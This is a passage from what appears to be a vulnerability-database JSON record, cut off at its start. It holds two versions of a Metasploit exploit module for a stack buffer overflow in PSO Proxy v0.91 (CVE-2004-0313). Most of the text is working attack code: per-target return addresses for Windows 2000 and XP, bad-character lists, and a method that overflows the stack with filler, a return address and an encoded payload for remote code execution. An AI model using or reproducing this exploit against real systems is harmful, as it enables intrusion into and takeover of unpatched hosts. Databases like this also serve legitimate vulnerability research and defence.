2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.\r\n\t\t\t\t\t[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call 
ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll\r\n\t\t\t\t\t[ 'Windows XP Pro SP2 English',\t { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Feb 20 2004'\r\n\t\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tsock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")\r\n\t\tbanner = sock.get(-1,3)\r\n\t\tif (banner =~ /PSO Proxy 0\\.9/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\texploit = rand_text_alphanumeric(1024, payload_badchars)\r\n\t\texploit += [target['Ret']].pack('V') + payload.encoded\r\n\r\n\t\tsock.put(exploit + \"\\r\\n\\r\\n\")\r\n\r\n\t\tdisconnect\r\n\t\thandler\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16790/"}], "metasploit": [{"lastseen": "2020-04-11T21:00:59", "description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server. 
If a client sends an excessively long string the stack is overwritten.\n", "published": "2007-09-09T22:37:43", "type": "metasploit", "title": "PSO Proxy v0.91 Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2017-11-08T16:00:24", "id": "MSF:EXPLOIT/WINDOWS/HTTP/PSOPROXY91_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.\n },\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-0313' ],\n [ 'OSVDB', '4028' ],\n [ 'EDB', '156' ],\n [ 'BID', '9706' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 370,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.\n [ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll\n [ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll\n [ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll\n [ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll\n [ 'Windows XP Pro SP2 English',\t { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Feb 20 2004'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n ])\n end\n\n def check\n connect\n sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")\n banner = 
sock.get_once\n if (banner.to_s =~ /PSO Proxy 0\\.9/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n exploit = rand_text_alphanumeric(1024, payload_badchars)\n exploit += [target['Ret']].pack('V') + payload.encoded\n\n sock.put(exploit + \"\\r\\n\\r\\n\")\n\n disconnect\n handler\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/psoproxy91_overflow.rb"}]}